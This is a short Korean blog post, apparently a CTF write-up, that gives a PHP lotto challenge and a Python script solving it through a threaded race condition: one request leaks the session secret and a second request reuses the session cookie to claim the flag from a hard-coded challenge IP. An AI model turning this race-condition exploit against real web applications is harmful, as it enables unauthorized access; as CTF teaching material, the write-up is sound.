문제
<?php function generate_secret() { return sha1("123").sha1("123"); } session_start(); if(!isset($_SESSION['secret'])) $_SESSION['secret'] = generate_secret(); if(!isset($_POST['guess'])) { echo 'Wanna play lotto? Just try to guess 320 bits.<br/><br/>'.PHP_EOL; highlight_file(__FILE__); exit; } $guess = $_POST['guess']; if($guess === $_SESSION['secret']) { $flag = require('flag.php'); exit('Lucky bastard! You won the flag! ' . $flag); } //else... echo "Wrong! '{$_SESSION['secret']}' != '"; echo htmlspecialchars($guess); echo "'"; $_SESSION['secret'] = generate_secret();
|
풀이
: 쓰레드를 이용한 레이스 컨디션
#!/usr/bin/python import thread import httplib, urllib guess = "" def thread1(): global guess headers = {"Content-type": "application/x-www-form-urlencoded", "Cookie": "PHPSESSID=123cookie" } conn = httplib.HTTPConnection("134.213.136.172", 80) conn.request("POST", "", "guess="+"A"*100000, headers) guess = conn.getresponse().read(92)[8:88] def thread2(): global guess headers = {"Content-type": "application/x-www-form-urlencoded", "Cookie": "PHPSESSID=123cookie" }
while guess=="": pass conn = httplib.HTTPConnection("134.213.136.172", 80) conn.request("POST", "", "guess="+guess, headers) response = conn.getresponse() data = response.read() print data conn.close() thread.start_new_thread(thread2, ()) thread.start_new_thread(thread1, ())
|
먼가 블로그에 올려야 겠다는 생각은 맨날 하는데.. 귀차니즘 때문에 자세히 포스팅은 안하는거 같네염..
'General News > Write-Ups' 카테고리의 다른 글
| [ConfidenceCTF-teaser]Power level (0) | 2015.04.28 |
|---|---|
| [ConfidenceCTF-teaser]Apache Underwear (0) | 2015.04.28 |
| HackIM nullcon exploitation400 (0) | 2015.01.11 |
| HackIM nullcon exploitation300 (0) | 2015.01.11 |
| HackIM nullcon 2015 exploitation100 (0) | 2015.01.11 |